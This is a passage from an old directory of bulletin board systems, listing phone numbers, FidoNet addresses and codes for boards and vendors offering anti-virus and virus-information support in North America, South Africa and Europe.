3103242188) ++1-408-9739598 Symantec/Norton Norton AntiVirus/Norton Utilites ++1-408-9739767 Symantec BBS ++1-408-9884004 HomeBase BBS, McAfee Assoc VIRUSCAN Suite ++1-409-8234155 The Parole Board, College Station TX (1:117/369) ++1-410-5292584 SyncPoint, Baltimore MD VIRINF (1:261/1008) ++1-410-8938255 The Rainbow Zen, Fallston MD VIR (1:261/1111) ++1-410-9749305 The North Star BBS VIR (1:261/1108) ++1-412-4815302 Pittsburgh Computer Virus Specialists BBS ++1-412-6783202 Magic Board BBS, McKeesport PA (1:129/165) ++1-412-9813151 Mabel's Mansion, Sharon PA (1:2601/100) ++1-414-3778462 The Phantom Tollbooth, Cedarburg WI (1:154/410) ++1-415-3375416 The PC GFX Exchange WRN (1:125/217.0) ++1-415-3656384 Ship to Shore, SF Bay West CA VIRINF (1:204/7.0) ++1-415-4310473 SeaHunt BBS, San Francisco CA (1:125/20) ++1-415-4542893 International Microcomputer (IMSI) VirusCure Plus ++1-415-5645623 Crystal Palace, San Francisco CA (9:101/107) (1:125/53) ++1-415-8261707 Foley Hi-Tech Systems Safety Disk ++1-415-8618290 Coconino County, San Francisco CA (1:125/28) ++1-416-2535900 SMARTalec, Etobicoke ON (1:250/834) ++1-416-4919249 Access-PC BBS, Scarborough ON VIR (1:250/320) ++1-416-4985602 Ali Salari asalari@gpu.utcs.utoronto.ca (1:250/508) ++1-416-4985602 OmegaStardock (2330-0630EDT) VIRINF (1:250/508) ++1-416-532-0456 Command Software Systems F-PROT Professional ++1-416-5710279 The Barn Stormers, Oshawa ON VIR AM (1:229/114) ++1-416-5796318 Motor City BBS, Oshawa ON (1:229/430) ++1-416-6297000 Canada Remote Systems, Toronto ON ++1-416-6297044 Canada Remote Systems, Toronto ON ++1-416-6622193 Data Warehouse, Stoney Creek ON VIRINF (1:244/133) ++1-416-7690022 CompuNet, Peter Avgerinos (1:250/407) ++1-416-7693401 CompuNet, Peter Avgerinos (1:250/407) ++1-416-8207273 Forbidden Knights Systems VIRINF (1:259/423) ++1-416-8402485 Age Of The Dark Renaissance VIRINF (1:259/210) ++1-416-8402485 The Sound Blaster Digest Support, Brampton ON (1:259/210) ++1-416-8453224 Sheridan College, Oakville ON (1:259/303) ++1-416-8930510 Life's a Beer, Toronto ON VIRINF (1:250/410) ++1-416-9846991 InfoTech Online SuperBBS VIRINF (1:247/124) ++1-417-6240000 Inside Ok! BBS, Joplin MO VIRINF (1:286/702) ++1-501-5251681 PC Virus Research Foundation BBS ??? ++1-501-9881077 A Toad's Haven BBS, Jax AR (1:3821/5) ++1-502-4259941 TopSoft Support (1:2320/4) ++1-502-4259942 TopSoft Support (1:2320/4) ++1-503-4882251 International Computer Virus Institute Eliminator ++1-503-5917882 ATC, Aloha OR VIRINF (1:105/343) ++1-503-6205910 NWCS Online VIRINF (1:105/362) ++1-503-6235530 White Dragon BBS, Dallas OR VIRINF (1:105/630) ++1-503-6354386 Information Anxiety, Lake Oswego OR (1:105/208) ++1-503-6456275 Intel Corporation LANProtect ++1-503-6630222 Axe Tax 'N More, Gresham OR VIRINF (1:105/450) ++1-503-6831385 Sydex BBS, Eugene OR Prune Disk Utility ++1-503-7613003 Eastside Data Services #2, Portland OR (1:105/61) ++1-504-8862157 WSTPC BBS, Nolan Lee (1:390/5) ++1-505-4739765 Selective On-Line, Santa Fe NM VIR (1:15/11) ++1-506-3259002 Driftnet, Wallace Hale, Woodstock NB SIX(TH) ++1-506-8497511 Programmer's Corner, Saint John NB (1:255/6.0) ++1-506-8590687 Red Dwarf BBS, Moncton NB VIRINF (1:255/202) ++1-508-5282295 Computer Confident!, Franklin MA (1:322/594) ++1-508-8758009 MSI S/W BBS, Framingham MA (1:322/327) ++1-508-9876182 LBD Consultants, Oxford MA VIRINF (1:322/507) ++1-510-4233331 Felicia BBS, Bill Orvis (orvis@llnl.gov) RVW ++1-510-4234753 Felicia BBS, Bill Orvis (orvis@llnl.gov) RVW ++1-510-6729325 Computer Communications, Concord CA (1:161/3216) ++1-512-2594896 Far Point Station HACK (1:382/77) ++1-512-2823941 Flotom Enterprises HACK (1:382/91) ++1-512-3211324 The Rendezvous, Bastrop TX VIRINF (1:382/92) ++1-512-5763893 NRFPT BBS, Victoria TX VIR (1:3802/221.0) ++1-512-8370953 JimNet, Austin TX VIR (1:382/29) ++1-514-3273406 Simple Solutions, Montreal PQ (1:167/224) ++1-514-3642937 Juxtaposition, Lasalle PQ (1:167/133) ++1-514-5957096 Avant 386, Lasalle PQ (1:167/190.1) ++1-514-6836729 XON/XOFF Information System, Montreal PQ (1:167/159) ++1-514-7281247 Radio-Amateur BBS, Montreal, PQ (1:167/134) ++1-514-7697546 SSSFFF, Montreal PQ (1:167/166) ++1-514-9377451 ABS International (Canada), Montreal PQ (1:167/136) ++1-516-4835841 Wizzard's Cave, Jon Freivald INT ++1-517-3938387 The Rec Room, Lansing MI (1:159/350) ++1-517-4839609 LCC CAI BBS, Lansing MI VIR (1:159/575) ++1-519-7671419 Spark-5, Guelph ON VIRINF (1:221/321) ++1-519-9721315 Dead End, Windsor ON (1:246/17) ++1-519-9739330 Windsor Download BBS VIR (1:246/15) ++1-601-4533963 MidNite ChowBoy, Greenwood MS VIRINF (1:368/1) ++1-602-7475236 Solitude BBS, Tucson AZ PC INT PC-Sentry (1:300/23) ++1-602-7906230 SouthWest Data, Tucson AZ (1:300/21) ++1-602-8414474 Artemis Lair, Phoenix AZ (1:114/116) ++1-602-9329243 Warzone, Avondale AZ VIRINF (1:114/150) ++1-602-9706901 RG Software Systems Diskwatcher/ViSpy/Virus Bulletin ++1-603-4320922 Leo Technology/NETIS PC VIRINF VIR INT (1:132/189) ++1-603-4322517 Leo Technology/NETIS PC VIRINF VIR INT (1:132/189) ++1-603-5369618 The Hobby Center, Plymouth NH PC VIRINF VIR (1:132/180) ++1-604-2612347 TheCage PC VIRINF VIR WRN VNT NET INT CVP RVW (1:153/733) Vrms ++1-604-2667754 The BandMaster, Vancouver BC VIRINF (1:153/715) ++1-604-3211646 The RedPoint BBS, Vancouver BC VIR (1:153/7060) ++1-604-3213068 Peace & Silence!, Vancouver BC (1:153/737) ++1-604-3226088 Peace & Silence!, Vancouver BC (1:153/717) ++1-604-3238417 Pasin MainFrame #3, Vancouver BC VIRINF (1:153/717) ++1-604-3652426 The Rumour Mill, Robson BC VIR (1:353/450) ++1-604-3746012 DaTaCoRp, Kamloops BC (1:353/730) ++1-604-3803055 The Wild Wild West VIRINF (1:340/62) ++1-604-4774508 The Mohave Desert VIRINF (1:340/60) ++1-604-5257715 RAVE (defunct) ++1-604-5263676 CyberStore, Vancouver BC $ AM AT MC PC Virus Doctor feed Vrms ++1-604-5331867 Bear Garden, Langley BC (1:153/920) ++1-604-6813667 Lambda Speaks, Vancouver BC WRN (1:153/756) ++1-604-7561521 The Annex BBS, Nanaimo BC VIR (1:351/401) ++1-604-7588084 The Excaliber BBS, Nanaimo BC VIRINF (1:351/287) ++1-605-2324648 The Voyager New Space To Explore, McCook Lk SD (1:288/2) ++1-606-8439363 Metaverse BBS, Bill Lambdin VIRINF LAT ++1-607-2575822 Memory Alpha, BAKA Computers Inc, Mark Anbinder ++1-607-6873470 NiteWing (8:72/5) (1:260/410) ++1-607-7244360 Ground Zero, Conklin NY (1:260/490) ++1-607-7977508 The Satellite of Love VIRINF (1:260/485) ++1-609-6601235 The Pigeon Coop, Manahawkin NJ VIRINF (1:266/63) ++1-609-7783103 .\lternate Reality VIRINF (1:266/37) ++1-612-5713290 The Enterprise Board, Fridley MN (1:282/60) ++1-612-5716280 The Enterprise Board, Fridley MN (1:282/60) ++1-612-6869177 HomeTown BBS, Eagan MN (1:282/3002) ++1-613-2305307 C.R.I.M.E. (Chez Rob's International Mail Exchange) ++1-613-3928294 Lion's Den, Trenton ON VIR (1:249/303) ++1-613-3943268 Bull's Eye, Trenton ON VIRINF (1:249/302) ++1-613-5239816 The Street, Ottawa ON (1:243/20) ++1-613-5265975 Sarcastic Cow, Gloucester ON (1:163/273) ++1-613-5472479 Challenged-I For the Abled, Kingston ON (1:249/138) ++1-613-5675146 Midnite Mania, Ottawa ON VIRINF (1:163/313) ++1-613-6872497 Misty Mountain BBS HACK Report (1:241/7) ++1-613-7295032 War on Virus Canada BBS ++1-613-7313419 Steve Tibbett VirusX for Amiga ++1-613-7314421 Inescapable Death, Ottawa ON VIRINF (1:163/449) ++1-613-7745290 Dundas Dynamo, Laurie Summers/Paul Hutchinson (1:163/284) ++1-613-8206684 DM BBS, Ottawa ON VIRINF (1:163/542) ++1-613-8207542 DM BBS, Ottawa ON VIRINF (1:163/542) ++1-613-8259302 Tumbler's Tavern VIRINF WRN (1:163/315) ++1-613-8309262 Rez-Tek Online VIR (1:163/517) ++1-613-9921603 ISSC BBS, Ottawa ON (1:163/152) ++1-614-4426696 Utilities Exchange (1:226/60) ++1-615-3724200 Hippie Commune, Baxter TN (1:3637/2) ++1-615-4422833 White Lightning, Madisonville TN Thunderbyte (1:3643/1) ++1-615-5263347 Cumberland, Cookeville TN (1:3637/1) ++1-617-2447053 The Beta BBS, Newton MA VIR (1:101/346) ++1-619-2774140 Alien Biker Kat VIRINF (1:202/1120) ++1-619-2810855 The Raging Main (replaces Programmer's Connection) ++1-619-2840799 The Programmers WorkShop, San Diego CA (1:202/204) Ctg ++1-619-4571836 Programmer's Paradise VIRUS-L Ctg ++1-619-5560136 CNSP/CNAP PCB (U.S. Navy BBS) ++1-619-5610058 Lion Share(ware) BBS VIRINF (1:202/1316) ++1-619-5623646 Foys' Trading Post, Santee CA VIRINF (1:202/1301) ++1-619-5886941 D.J.M.BBS VIRINF (1:202/104) ++1-619-6931575 A-1 EZ OK MC (1:202/234) ++1-619-9515456 The Back Door, Victorville CA VIRINF (1:202/1110) ++1-702-2270270 Dark Tower, Las Vegas NV (1:209/220) ++1-702-3672758 Act One BBS, Las Vegas NV (1:209/237) ++1-702-8763316 Rise of the Dragon VIRINF (1:209/233) ++1-703-3690672 OS/2@Manassas, Manassas VA (1:265/101) ++1-703-5732246 The Fido Exchange, Vienna VA (1:109/353) ++1-703-5735606 The Fido Exchange (1:109/353) ++1-703-5738990 2775-B Hartland Road, Falls Church, VA 22043 ++1-703-5738990 Norman Defense Data Systems Inc. V-Base ++1-703-7201624 End of the Line, Duane Brown VIRINF NET (1:274/16) ++1-703-7501625 Little Larry's Place, Springfield VA (1:109/3) ++1-703-7563976 BXR Info Corner, Falls Church VA (1:109/158) ++1-703-7566109 BXR Info Corner, Baileys Xroads VA VIRINF (1:109/158.0) ++1-703-8153244 Sentry Net, DStevens, Centreville VA VIRINF VIR(1:109/229) ++1-703-8988153 Burleigh's BBS, Spotsylvania VA (1:274/6) ++1-703-9632460 The XT Connection, Richlands VA VIRINF (1:3622/801) ++1-704-5681663 Carolina Forum PC AM MC (8:926/2) ++1-705-5274029 Shockwave BBS, Midland ON (1:252/404) ++1-706-5683151 Hill Side BBS (1:3613/1) ++1-706-5968126 Under The Nile, Cairo Rsrch, S Burkett, Col. GA(1:3613/12) ++1-706-8605070 The Public's Domain VIR (1:360/14) ++1-707-5520462 The Power Station VIRINF (1:161/123) ++1-708-8273619 Lambda Zone VIRINF (1:115/827) ++1-708-8877685 FamilyNet International Echogate (1:115/887) ++1-709-3684353 Space Odyssey, Mount Pearl NF VIRINF (1:255/202) ++1-713-2428363 Bulldozers BBS VIRINF (1:106/242) ++1-713-3341136 Uncle Wally's Place, Houston TX VIRINF (1:106/1136) ++1-713-3764767 Texas Fathers for EQUAL Rights! VIR (1:106/1555) ++1-713-4999730 Jagged Edge, Stafford TX (1:106/9730.0) ++1-713-6646019 The Breeze Rbbs, Bellaire TX (8:930/501.0) ++1-713-6978811 The Anti-Virus BBS, Houston TX ++1-713-9809671 COMM Port One, Sugar Land TX (1:106/2000) ++1-714-2559508 Colossus Galactica, Brea CA VIR (1:103/307) ++1-714-9231031 The Diamond Bar, Ontario CA (1:207/101) Ctg ++1-716-2623680 The Black Cat Information Service VIRINF (1:2613/475) ++1-716-7687973 Exit 47/LeRoy BBS, LeRoy NY WRN (1:260/220) (1:2613/810) ++1-717-2430055 L & T's Spitfire BBS (1:270/713) ++1-717-6893123 Brinkman's Hollow, Hamlin PA (1:268/324) ++1-718-7296101 The Dorsai Diplomatic Mission, Brooklyn NY (1:278/706) ++1-718-9341843 Shadowdale Telegard Alpha #2 VIR (1:278/624.0) ++1-803-4994316 Carolina Connections, Sumter SC VIRINF (1:3647/1.0) ++1-803-5245655 Broad River Emporium VIR (1:3650/3) ++1-803-5737069 The Dark Corner, Spartanburg SC VIRINF (1:3639/203) ++1-803-5737069 The Dark Corner BBS, Spartanburg SC VIRINF (1:3652/3) ++1-804-4363125 The Apex VIRINF (1:275/99) ++1-804-4831482 The File Allocation Table in VA (1:275/16) ++1-804-7373967 Greater Richmond Connection, Richmond VA VIR (1:264/177) ++1-804-8650222 Turn and Burn BBS, Hampton VA (1:271/275) ++1-805-3436018 Chthonic VIRINF (1:206/2601) ++1-805-5469150 XTree Co. BBS ViruSafe ++1-806-3587032 The Town Crier, Amarillo TX VIRINF (1:3816/126) ++1-808-6769420 The Joyous Occasion BBS (85:818/106) ++1-809-2694970 Ranger BBS, Bayamon PR (1:367/23) ++1-813-2393704 Bits of Blue, Tampa FL VIRINF (1:377/32) ++1-813-2867084 The Godfather BBS, Tampa FL VIRINF (1:377/54) ++1-813-3924280 Programmer's Realm II VIRINF (1:3603/280) ++1-813-5252326 *SPPE* Origin-o:just Italian Seasoning (1:3603/326) ++1-813-8494034 SHI USA East, Port Richey FL Jim Maciorowski (defunct?) ++1-813-8628850 Studio PC BBS VIR (1:3619/1) ++1-813-9616242 T.A.B.B., Tampa FL (1:377/6) ++1-813-9800228 Does Your Mother Know, Tampa FL (1:377/37) ++1-815-7531800 NIU Connection VIR (1:11/70.0) ++1-816-3224547 Solo-Quest VIR (1:280/315) ++1-816-4362843 Maple Woods, Kansas City MO (1:280/7) ++1-816-8873451 Gryphon, Harrisonville MO (1:280/69) ++1-817-2496261 CyberVille, Benbrook TX VIR (1:130/78) ++1-817-2830843 Spare Parts VIR (1:130/38) ++1-817-4733621 Nemesis VIR (1:130/61) ++1-817-5922960 Fire Point, BOCA VIR (1:3805/4) ++1-817-6905527 House Of Golem, Killeen TX 76543 (1:395/21) ++1-817-7617735 WFPD BBS VIR (1:3805/6) ++1-817-7617738 WFPD BBS VIR (1:3805/6) ++1-817-7933558 Wizard BBS, Killeen TX (1:395/8) ++1-817-8555420 Maximum Overdrive, Wichita Falls TX (1:3805/8) ++1-818-5667912 Rambo-Scan WWIV (Public BBS) ++1-818-7920419 Inter-BBS, Pasadena CA VIRINF (1:102/741.200) ++1-818-8829058 The Sweet Life PCBoard, Canoga Park CA (1:102/815) ++1-818-9857150 Los Angeles Valley College VIRINF (1:102/837) ++1-819-6859046 Multi Vision, Aylmer PQ (1:163/304) ++1-902-4535731 the Max!, Halifax NS (1:255/107) ++1-902-4548351 the Max!, Halifax NS VIRINF (1:255/107) ++1-904-3353522 The Pyramid VIRINF (1:3601/31) ++1-904-3778574 Transcom II BBS, Gainesville FL (1:3601/32) ++1-904-3868693 Wingit, Tallahassee FL ++1-904-6515241 Connection, Shalimar FL VIRINF (1:366/17) ++1-904-7292110 digital underground, eglin afb, fl VIRINF (1:366/43) ++1-904-9681881 Nuclear Wastelands VIR (1:3612/601) ++1-906-4861836 Bytes-r-Us, Ishpeming Mi VIRINF (1:2280/1) ++1-907-4883751 T.C.'s Byte Bank System, North Pole AK (1:355/2) ++1-908-2576029 Brunswick Mart BBS, Edison NJ ++1-908-3228006 ACGNJ Main, Fanwood NJ VIRINF (1:2605/704) ++1-908-3228390 ACGNJ Main, Fanwood NJ VIRINF (1:2605/704) ++1-908-3609462 Synthesis BBS, Central NJ VIR (1:107/639) ++1-908-6329452 Expressway BBS, Edison NJ (1:107/3001) (1:107/387) ++1-908-8214533 The Maven's Roost, Kendall Park NJ VIR (1:107/390) ++1-912-2476977 Business Connection (1:3645/10) ++1-912-9298536 La Villa Strangiato VIR (1:3611/18) ++1-912-9532708 Mother's Kitchen, Centerville GA (1:3611/19) ++1-913-6481412 Foundation BBS, Overland Park KS (1:280/335) ++1-914-2250501 Wincomp Opus (1:272/29.0) ++1-914-3547499 SENY Echomail HUB, Spring Valley NY (1:272/1) ++1-914-3743903 The MailMan, NY (1:272/34) ++1-914-6776948 Bear Heaven, Walter & Debbie Bodin VIR (1:272/53) ++1-914-7626954 Implosion BBS, Millwood NY (1:272/54) ++1-914-8898379 The Link BBS VIRINF (1:272/46) ++1-914-9617032 DataShack BBS, Eastchester NY (1:272/55) ++1-916-3317318 The OtherWhen BBS, Sacremento CA VIRINF (1:203/601.0) ++1-916-3341620 KSBE Digital Radio Datamaze VIRINF (1:203/100.0) ++1-916-3448146 Silverado Express, N Highlands CA VIRINF (1:203/1102) ++1-916-7222569 Alpha & Omega (1:203/56) ++1-916-7538788 Dynasoft TimeGates VIRINF MC (1:203/955) ++1-916-9659361 The Genesis Satellite System (1:203/965) ++1-918-4921749 Morning Star BBS, Tulsa OK VIRINF (1:170/307) ++1-918-6650885 Wayne's World BBS, Tulsa OK (1:170/204) ++1-918-7452448 The Tower of London BBS (1:170/213) ++1-919-3551560 The Void BBS, Greenville NC (1:3629/415) ++1-919-4191602 Datawatch (frmrly Microcom) Virex-PC/Virex-Mac/VIRx ++1-919-7783218 Software Cache, Goldsboro NC VIRINF (1:151/811) ++27-11-4031757 Golden City Opus, Johannesburg RSA (5:7101/1) ++27-11-4122540 Rand Datasystems Technology VIR (5:7101/38.0) ++27-11-4754941 Bombed Out, Klerksdorp RSA (5:7105/6) ++27-11-4764735 NetLine-2, Randburg RSA (5:7101/19) ++27-11-4771225 Netline Northcliff VIR (5:7101/24.0) ++27-11-7061749 Fast! BBS, Sandton RSA (5:7101/47) ++27-11-7682435 Layout de Marillac, Johannesburg VIR VIRINF (5:7101/40) ++27-11-8171321 The Graphics BBS VIR (5:7101/56) ++27-11-8645787 DePtHs Of InSaNiTy, Alberton RSA VIR (5:7101/54) ++27-12-2212345 Novell User Group, Pretoria RSA (5:7101/22) ++27-12-6602410 Top Byte, Verwoerdburg RSA (5:7101/37) ++27-16-660955 Netline KSD, Henley-On-Klip (5:7101/6) ++27-17184102 Goldfields, Welkom (5:7105/1) ++27-18-86524 Bombed Out, Klerksdorp RSA (5:7105/6) ++27-21-242208 Information Security, Cape Town RSA (5:7102/110) ++27-21-242208 Oliver Steudler PC VIR VIRINF RVW CVP ++27-21-261101 Magnum BBS, Cape Town RSA (5:7102/111) ++27-21-5576775 Chaos Manor HACK (5:7102/713) ++27-31-7655045 Softel Monster BBS, Natal (5:7103/1.0) ++27-41-341122 The Catalyst, Sajid Rahim, Port Elizabeth RSA (5:7105/4.5) ++27-41-341122 The Catalyst BBS 1, Port Elizabeth (5:7104/1) ++27-41-342859 The Catalyst INT (catpe.alt.za) (5:7105/4.5) ++30-1-2110614 Gambler BBS, Athens Greece VIR (2:410/109) ++30-1-2927972 Noise Forest System VIR (2:410/107.1) ++30-1-3607882 Onned BBS, Athens Greece VIR (2:410/110) ++30-1-4954630 Master Mailing System, Pireaus Greece VIR (2:410/123.0) ++30-1-8050723 Metal Mutant BBS Pefki, Athens Greece VIR (2:410/114) ++30-431-72171 SHI GREECE, Konstantinos Angelis, Box 50784, Thessaloniki ++30-541-76052 The East Way, Xanthi, Greece (2:410/8.3) ++31-10-4795892 [MPwrHQ] 1st European #Cc.MisTeam VIRINF (2:512/1007.2) ++31-10-4795892 Sae[Dv]Remote, E Cleton, Rotterdam PC VIR VNT ++31-10-4862184 Maasstad BBS VNT (9:310/300) ++31-15-626535 RedBox! VIRNET (9:310/15) (2:281/618) ++31-1621-17804 The Fly BBS, Nederland VIRINF (2:285/213) ++31-1899-19989 Albert Louw, Holland VNT (9:310/1) (2:285/521) ++31-20-6391620 BULLET VNT (9:314/206) ++31-20-6962860 PCN, Amsterdam NL (2:280/415) ++31-2159-36349 Dirk-Jan's BBS, Bussum NL (2:500/289) ++31-23-316333 HCC Kennemerland, Haarlem NL (2:500/45) ++31-2998-3603 Bamestra RBBS, Beemster NL (2:512/10) ++31-30-440955 FLASH BBS, Utrecht NL VIR (2:512/43) ++31-3200-48835 Virus Rescue BBS, Lelystad NL (2:282/401) ++31-3402-41167 Bitbull BBS, Nieuwegein NL (2:512/153) ++31-3408-70908 BBS IJsselstein VIRINF (2:512/142) ++31-45-275101 HCC Olivetti GG Heerlen, Brunssum (2:500/120) ++31-4927-65271 Googol Board VNT (9:313/0) ++31-4998-97759 Def Board Multi Line Palace Best NL (2:284/202) ++31-53-303902 KIM Gebruikersclub Nederland (KGN) - /328506 (2:512/32) ++31-53-310897 UtilSoft BBS VIRINF (2:283/326) ++31-53-328506 KIM Gebruikersclub Nederland (KGN) - /303902 (2:512/32) ++31-53-770281 Big Hole, Enschede NL (2:283/303) ++31-53-773628 Big Hole, Enschede NL (2:283/303) ++31-55-431332 Discovery BBS, Apeldoorn NL (2:500/249) ++31-58-670887 Coosjer-BBS, Leeuwarden NL (9:314/13) ++31-58-675911 The Experience, Leeuwarden NL VIR (2:282/360) ++31-5976-2020 Odin Never On Line, Blijham NL VIRINF (2:512/58.3) ++31-70-3898822 Support BBS for PC Vaccine Professional ++31-70-3898822 Infodesk, F Hagelaars, The Hague NL VIRINF VIR (2:512/2) ++31-70-3898822 Infodesk, Frans Hagelaars, The Hague NL (2:2801/1007) ++31-73-569797 The Gauntlet (2:512/37) ++31-77-870559 De Werkplaats, Venlo NL (2:500/255) ++31-78-176468 Da Vinci, Dordrecht NL (2:285/308) ++31-8389-15331 BBS Bennekom VIR (2:283/203.0) ++31-85-212395 Thunderbyte Help, Arnhem NL (2:280/200) ++32-11-568620 Luc Shoofs, Belgium VNT (9:321/101) (2:296/10) ++32-14-312818 Info-Center BBS VIR (2:292/401) ++32-14-656289 Lions & Pittaway, Belgium VIRINF (2:292/405) ++32-14-658726 Lions & Pittaway, Belgium VIRINF (gone 930601)(2:292/405) ++32-15-520279 The Cormoran BBS, Hever (2:292/500) ++32-2-4606546 RTV-SAT BBS, Belgium (2:291/709.108) ++32-63-219642 FBH System VIR (2:293/2601) ++32-71-402677 The NoNamE BbS Chatelineau Belgique VIRINF (2:293/2003.1) ++33-1-42060305 Logidata International S.A. France TBAV agent ++33-1-43074097 Li'LL BBS, Paris FR VIR (2:320/7) ++33-20392225 E Vandermeersch, France VNT (9:331/101) (2:322/2) ++33-39-529854 CAD Connection, Montesson FR (2:320/203) ++33-84-268606 A.C.M.E. BBS, Belfort FR VIR (2:325/1) ++34-58-123848 Alfredo Sanchez, Spain VNT (9:341/101) (2:345/801) ++351-1-3526426 Justin Solvsten, Portugal VNT (9:3511/101) (2:362/3) ++351-1-8869095 Kaos BBS, Lisbon, Portugal (2:362/21) ++351-34-382467 Inforlandia, Aveiro (2:361/4) ++353-1-2831908 Stephen Kearon, Ireland VNT (9:3531/101) (2:263/167) ++353-1-711047 TOPPSI, Dublin Ireland (2:263/151.0) ++353-1-773547 TOPPSI, Dublin Ireland (2:263/151.0) ++353-51-83771 Reflex AV-BBS VIR (9:3532/0) (2:263/401) ++354-2-14626 Vision Bulletin Board System VIR (2:391/20) ++358-0-4551011 IntroPoli, Finland (2:220/91.59) ++358-0-735316 SL, Helsinki Finland (2:220/456) ++358-0-735316 K Ylhavuori, Helsinki Finland VNT (9:3581/104) (2:220/456) ++359-2-650057 Hristo Mitov, Bulgaria VNT (9:3591/101) (2:359/108) ++359-2-737484 Lab of Computer Virology, A Sharlandjiev, Bulg.(2:359/110) ++359-52-451561 Navigator Gate, Varna Bulgaria VIRINF (2:359/10) ++36-1-1154402 VirNET, Janos Kiss, Budapest (2:371/9) ++36-52-49662 LifeForce (18-06h), Hungary VIRINF (9:361/103) ++36-56-372189 Erno Petro, Hungary VNT (9:361/101) (2:370/1) ++36-56-422189 Erno Petro, Hungary VNT VIRINF (9:361/101) (2:370/1) ++39-40-3783111 Fido, Trieste (2:333/603) ++39-45-568713 The Axis, Verona (2:333/103) ++39-523-896512 Rodolfo Vardelli, Italy VNT (9:391/101) (2:331/206) ++39-6-5411061 Power of KnowLedge, G Finocchiaro MC2464@mclink.it ++39-766-540899 Virus Help HQ, Civitavecchia (2:335/5) ++39-81-5453744 The World BBS, Napoli Italy (2:335/4) ++39-81-7701852 Gold BBS, Napoli Italy VNT (9:395/108) (2:335/220) ++39-95-501010 Catania Uno, Catania (2:335/503) ++41-1-2730122 R Schmidiger, Switzerland VNT (9:412/101) (2:300/801) ++41-61-3210379 YaCaN-BBS VNT (9:412/410) ++42-5-749889 CSFR, Pavel Mrnustik VNT (9:421/101) (2:241/24) ++43-2216-2153 F De Cassan, Austria VNT (9:432/102) (2:313/14) ++43-2252-764590 Watchdog's BBS, Sooss A (2:313/100) ++44-21-7881754 Faint Breeze, Birmingham UK (2:253/164) ++44-222-707359 Black Cat BBS VIR (2:251/27) ++44-224-827166 Blue Label BBS, Aberdeen UK (2:259/22) ++44-241-2793 Glasterlaw BBS, Arbroath UK (2:259/24) ++44-244-550332 Peter Duffield AM/MC/PC CVP/RVW CVC VIRUS-L (2:250/201) Vrms ++44-244-550332 N.Wales pd@nwavbbs.demon.co.uk VNT (9:441/110) (2:250/201) Vrms ++44-244-827166 Blue Label BBS VIR (2:259/22.0) ++44-273-509152 Spartacus, Brighton (2:441/27) ++44-273-688888 Six & Five 8's (2:441/86.0) ++44-273-699999 Six & Five 8's (2:441/86.0) ++44-282-850011 Random Access, Barnoldswick UK VIR (2:256/38) ++44-342-717800 Airtel Remote Access VIR (2:440/64.0) ++44-392-433566 NCSA, B Sterrett, Exeter UK VNT (9:441/101) (2:255/34) ++44-41-8807845 Alba Maximus, Glasgow/Barrhead (2:259/2) ++44-494-724946 S&S International Dr. Solomon's Anti-Virus Toolkit ??? ++44-506-440582 Wally's BBS, Livingston Scotland (2:259/27) ++44-533-700368 Formal Dress Not Essential VIR (2:253/161) ++44-536-414103 The Pegasus Connection, Kettering VIR (2:258/28) ++44-602-855607 Index III, Nottingham UK VIR (2:250/413.0) ++44-602-855661 Index III, Nottingham UK VIR (2:250/413.0) ++44-61-4426758 Seven Seas, Stockport VIR (2:253/410) ++44-61-7072008 DOA/UK's Number 1 AntiVirus BBS, Manchester (2:250/110) ??? ++44-61-7961770 The Cavern BBS, Manchester UK VIR (2:250/102.0) ++44-695-31439 Byteseyes BBS, Skelmersdale UK (2:440/507) ++44-705-511590 GABBS, Gosport (2:251/16) ++44-706-376624 Teenage Retreat, Littleborough (2:258/16) ++44-734-320812 Golly!, Twyford (2:252/21) ++44-737-766027 Infotel, Redhill UK (2:252/206) ++44-738-52063 Guru-Ten BBS, Perth UK (2:259/6) ++44-793-432955 Intel Corporation LANProtect ++44-81-3904701 Pyrotechnix BBS VIR (2:440/38.0) ++44-81-3955096 Test Drive BBS (2:254/40) ++44-81-4478244 The Crystal Tower, Enfield UK (2:440/25) ++44-81-7470749 Tornado BBS, London UK (2:440/114) ++44-843-852495 Amiga World BBS, Kent UK VIR (2:440/115) ++44-862-88340 Raytech BBS VIR (2:259/49) ++44-895-270762 FreeMatrix BBS VIR (2:254/39) ++44-933-401101 Cat Flap BBS, Wellingborough (2:258/27) ++45-31427264 AMC International & RA Support, Copenhagen DK (2:231/50) ++45-42-367481 Dan.Crypt.Cen.Roskilde Kjell Olsen(9:451/170)(2:234/79.15) ++45-45-875316 Frog BBS, Lyngby (2:230/151) ++45-53-847074 Horreby SuperBBS VNT (9:451/169) (2:230/512) ++45-86936822 Thomas Schmidt, Denmark VNT (9:451/101) (2:230/74) ++46-26275710 Virus Help Ctr #1, M Larsson VNT (9:461/101)(2:205/204) ++46-26275715 Virus Help Ctr #2 vhc@abacus.hgs.se (9:461/101)(2:205/234) ++46-36-121323 NewAge BBS, Jnkping Sweden VNT (9:9/1) (2:204/503) ++46-431-70909 Buller BBS, Bastad (2:200/221) ++46-620-12955 NKAB Sweden TBAV agent ++46-620-13709 NKAB Sweden TBAV agent ++46-620-13796 NKAB Sweden TBAV agent ++46-620-17154 NKAB Sweden TBAV agent ++46-8-59088689 LusseBurken Stckhlm (9:462/111 or 136 2:201/269 2:201/262) ++46-8-7602615 Dr Solomon's Anti-Virus Toolkit ++46-8-7602615 Tel +46-8-7602600 Fax +46-8-7602605 (2:201/370) ++46-8-7602615 micke.l@qainfo.se 100135,1742@Compuserve.com (2:201/370) ++46-8-7602615 PO Box 596 S-175 26 Jarfalla Sweden (2:201/370) ++46-8-7602615 Micke Larsson, QA Informatik AB (2:201/370) ++46-8-7609162 Lost Toy BBS VIR (2:201/236.4) ++46-90-149205 Back To Business Base BBS VNT (9:466/200) ++46-910-52214 Artic BBS CSC #1, Skelleftea (2:205/422) ++48-22-315889 Akme BBS, Warszawa [Warsaw Poland] (2:480/21) ++49-202-305803 Justin Mann, Germany VNT (9:491/1000) (2:241/5601) ++49-203-750511 Duisburg Germany Shuttle VNT (9:493/1190) (2:2401/111) ++49-211-671635 Local Service, Duesseldorf VIR (2:241/4158) ++49-2196-95289 B.L.M., Wermelskirchen (2:2402/61) ++49-221-737134 Gayline, Cologne Germany VNT (9:491/4090) (2:2402/109) ++49-2309-77019 WayForward, Tobias Burchhardt VNT (9:492/6050) (2:245/39) ++49-2330-13353 Stones, Herdecke (2:245/5804) ++49-2331-64435 WildCat Hagen VNT (9:495/0) (2:248/25) ++49-2331-67555 WildCat Hagen VNT (9:495/0) (2:248/210) ++49-2824-16212 Kalkar BBS, Kalkar (2:2401/209) ++49-5252-973212 Urmel's Eis, Bad Lippspringe (2:242/55) ++49-531-681034 Download Paradise VNT (9:491/6000) (2:240/500) 